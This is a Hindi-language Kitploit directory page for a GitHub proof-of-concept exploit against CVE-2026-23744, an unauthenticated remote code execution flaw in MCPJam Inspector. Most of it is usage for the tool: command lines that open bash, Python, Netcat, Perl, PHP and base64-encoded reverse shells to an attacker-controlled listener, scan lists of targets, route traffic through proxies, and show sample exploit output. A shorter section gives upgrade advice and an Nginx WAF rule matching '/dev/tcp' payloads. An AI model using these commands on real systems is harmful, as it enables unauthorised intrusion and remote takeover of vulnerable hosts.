Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-23744-MCPJam-Exploit — CVE-2026-23744 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट - MCPJam इंस्पेक्टर रिमोट कोड निष्पादन (RCE) भेद्यता। यह टूल संस्करण <=1.4.2 में सुरक्षा दोष प्रदर्शित करता है और सुरक्षा शोधकर्ताओं को पैच सत्यापित करने में मदद करता है। केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए। इसमें कई पेलोड विकल्प, कमांड निष्पादन और सत्र प्रबंधन शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cve-2026-23744-mcpjam-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubcerberusmrxi/cve-2026-23744-mcpjam-exploit

CVE-2026-23744-MCPJam-Exploit

रिपॉजिटरी देखें
7141 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

CVE-2026-23744 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट - MCPJam इंस्पेक्टर रिमोट कोड निष्पादन (RCE) भेद्यता। यह टूल संस्करण <=1.4.2 में सुरक्षा दोष प्रदर्शित करता है और सुरक्षा शोधकर्ताओं को पैच सत्यापित करने में मदद करता है। केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए। इसमें कई पेलोड विकल्प, कमांड निष्पादन और सत्र प्रबंधन शामिल हैं।

साझा करें

CVE-2026-23744 MCPJam Inspector RCE एक्सप्लॉइट

Security Research Python 3.7+ Version Author


⚠️ अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है। उपयोगकर्ता अपने कार्यों की पूरी जिम्मेदारी लेते हैं।


📋 अवलोकन

इस रिपॉजिटरी में CVE-2026-23744 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट है, जो MCPJam Inspector संस्करण <=1.4.2 में पाई गई एक बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) कमजोरी है। इस कमजोरी का CVSS स्कोर 9.8 (क्रिटिकल) है, जो नेटवर्क अटैक वेक्टर के साथ गंभीर जोखिम दर्शाता है।

विशेषताविवरण
CVE IDCVE-2026-23744
कमजोरीबिना प्रमाणीकरण के रिमोट कोड निष्पादन
प्रभावित संस्करण<=1.4.2
CVSS स्कोर9.8 (क्रिटिकल)
हमला वेक्टरनेटवर्क

📸 स्क्रीनशॉट

ex

🚀 विशेषताएं

  • मल्टी-पेलोड सपोर्ट: इसमें Bash, Python, Netcat, Perl, PHP, और Base64 पेलोड शामिल हैं।
  • कमांड निष्पादन: आउटपुट कैप्चर के साथ लक्ष्य सिस्टम पर कमांड निष्पादित करें।
  • लक्ष्य स्कैनिंग: कॉन्फ़िगरेबल रेट लिमिटिंग के साथ कई लक्ष्यों को स्कैन करें।
  • सत्र प्रबंधन: चल रहे परीक्षण के लिए स्थायी सत्र प्रबंधन।
  • प्रॉक्सी सपोर्ट: गुमनाम या रूटेड ट्रैफिक के लिए प्रॉक्सी के साथ एकीकरण।
  • लक्ष्य फिंगरप्रिंटिंग: लक्ष्य सिस्टम की विशेषताओं की पहचान करें।
  • ऑटो-लिसनर सेटअप: रिवर्स शेल के लिए स्वचालित रूप से लिसनर कॉन्फ़िगर करें।

📦 इंस्टॉलेशन

एक्सप्लॉइट टूल सेट अप करने के लिए, इन चरणों का पालन करें:

  1. रिपॉजिटरी को क्लोन करें:

    root@kitploit:~
    git clone https://github.com/CerberusMrXi/CVE-2026-23744-MCPJam-RCE-Exploit.git
    cd CVE-2026-23744-MCPJam-RCE-Exploit
    
  2. डिपेंडेंसी इंस्टॉल करें:

    root@kitploit:~
    pip install -r requirements.txt
    

🎯 उपयोग उदाहरण

बेसिक एक्सप्लॉइटेशन

बेसिक एक्सप्लॉइट शुरू करने के लिए, पहले एक लिसनर सेट करें, फिर एक्सप्लॉइट स्क्रिप्ट चलाएं:

root@kitploit:~
# Start listener
nc -lvnp 4444

# Run exploit
python exploit.py -u http://target-ip:8080 -l attacker-ip -p 4444

कमांड निष्पादन

एकल कमांड या फाइल से कमांड निष्पादित करें:

root@kitploit:~
# Execute single command
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -c "id; whoami"

# Execute commands from file
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -C commands.txt

विभिन्न पेलोड

विभिन्न परिदृश्यों के लिए विभिन्न पेलोड प्रकारों का उपयोग करें:

root@kitploit:~
# Python reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t python

# Netcat reverse shell
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t nc

# Base64 encoded payload
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -t base64

लक्ष्य स्कैनिंग

कमजोरी के लिए कई लक्ष्यों को स्कैन करें:

root@kitploit:~
# Create targets file
echo "http://192.168.1.10:8080" > targets.txt
echo "http://192.168.1.11:8080" >> targets.txt

# Scan for vulnerable targets
python exploit.py -f targets.txt -l 10.0.0.5 -p 4444 --scan

उन्नत विकल्प

फिंगरप्रिंटिंग, प्रॉक्सी उपयोग, वर्बोज़ मोड, और ऑटो-लिसनर सेटअप जैसी उन्नत कार्यक्षमताओं का अन्वेषण करें:

root@kitploit:~
# With fingerprinting
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --fingerprint

# With proxy
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --proxy http://127.0.0.1:8080

# Verbose mode
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 -v

# Auto-listener
python exploit.py -u http://target:8080 -l 10.0.0.5 -p 4444 --listen

🔧 पेलोड प्रकार

प्रकारकमांडसर्वोत्तम उपयोग
bashBash reverse shellअधिकांश Linux सिस्टम
pythonPython3 reverse shellPython इंस्टॉल सिस्टम
ncNetcat reverse shellNetcat वाले सिस्टम
perlPerl reverse shellPerl इंस्टॉल सिस्टम
phpPHP reverse shellPHP इंस्टॉल सिस्टम
base64Base64 encodedपता लगाने से बचना

📊 उदाहरण आउटपुट

root@kitploit:~
[+] Starting enhanced exploit against http://192.168.1.100:8080
[+] Reverse shell to 10.0.0.5:4444
[*] Session ID: AbCdEfGh
[*] Fingerprinting target...
[+] Target OS: Ubuntu
[+] Available capabilities: python3, perl, nc
[*] Executing exploit...
[+] Exploit successful!
[!] Check your netcat listener on 10.0.0.5:4444

🛡️ शमन

तत्काल कार्रवाई

CVE-2026-23744 से बचाव के लिए निम्नलिखित तत्काल कार्रवाई करना महत्वपूर्ण है:

  • MCPJam Inspector को संस्करण >1.4.2 में अपग्रेड करें।
  • कमजोर सिस्टम को नेटवर्क से अलग करें।
  • /api/mcp/connect पर संदिग्ध POST अनुरोधों की निगरानी करें।
  • दुर्भावनापूर्ण पैटर्न को ब्लॉक करने के लिए वेब एप्लिकेशन फायरवॉल (WAF) नियम लागू करें।

WAF नियम उदाहरण

सामान्य दुर्भावनापूर्ण पैटर्न को ब्लॉक करने के लिए उदाहरण Nginx WAF नियम:

root@kitploit:~
location /api/mcp/connect {
    if ($request_body ~* "bash.*/dev/tcp") { return 403; }
    if ($request_body ~* "base64.*-d") { return 403; }
    proxy_pass http://backend;
}

❓ अक्सर पूछे जाने वाले प्रश्न (FAQ)

प्रश्न: क्या इसका उपयोग कानूनी है?

उत्तर: यह उपकरण केवल उन सिस्टम पर उपयोग करना कानूनी है जिनके आप मालिक हैं या जिनके परीक्षण की आपको स्पष्ट लिखित अनुमति है।

प्रश्न: कौन से सिस्टम कमजोर हैं?

उत्तर: MCPJam Inspector संस्करण <=1.4.2 कमजोर हैं।

प्रश्न: मैं अपने सिस्टम की सुरक्षा कैसे कर सकता हूं?

उत्तर: तुरंत MCPJam Inspector संस्करण >1.4.2 में अपग्रेड करें।


📚 संदर्भ

  • CVE-2026-23744 MITRE

👤 लेखक

Sudeepa Wanigarathna

  • GitHub: @CerberusMrXi

📝 बदलाव लॉग

संस्करण 2.0 (14 जुलाई, 2026)

  • ✅ लिसनर जाँच विश्वसनीयता ठीक की गई
  • ✅ कमांड निष्पादन मोड लागू किया गया
  • ✅ लक्ष्य फिंगरप्रिंटिंग जोड़ा गया
  • ✅ सत्र प्रबंधन बढ़ाया गया
  • ✅ पेलोड फॉलबैक जोड़े गए

संस्करण 1.0 (10 जुलाई, 2026)

  • ✅ प्रारंभिक रिलीज़

⚠️ अंतिम चेतावनी

इस उपकरण का अनधिकृत उपयोग अवैध है और इसके गंभीर परिणाम हो सकते हैं, जिनमें शामिल हैं:

  • आपराधिक अभियोजन
  • सिविल मुकदमे
  • स्थायी आपराधिक रिकॉर्ड
  • पेशेवर प्रतिबंध

❤️ के साथ बनाया गया Sudeepa Wanigarathna द्वारा

टूल डाउनलोड करें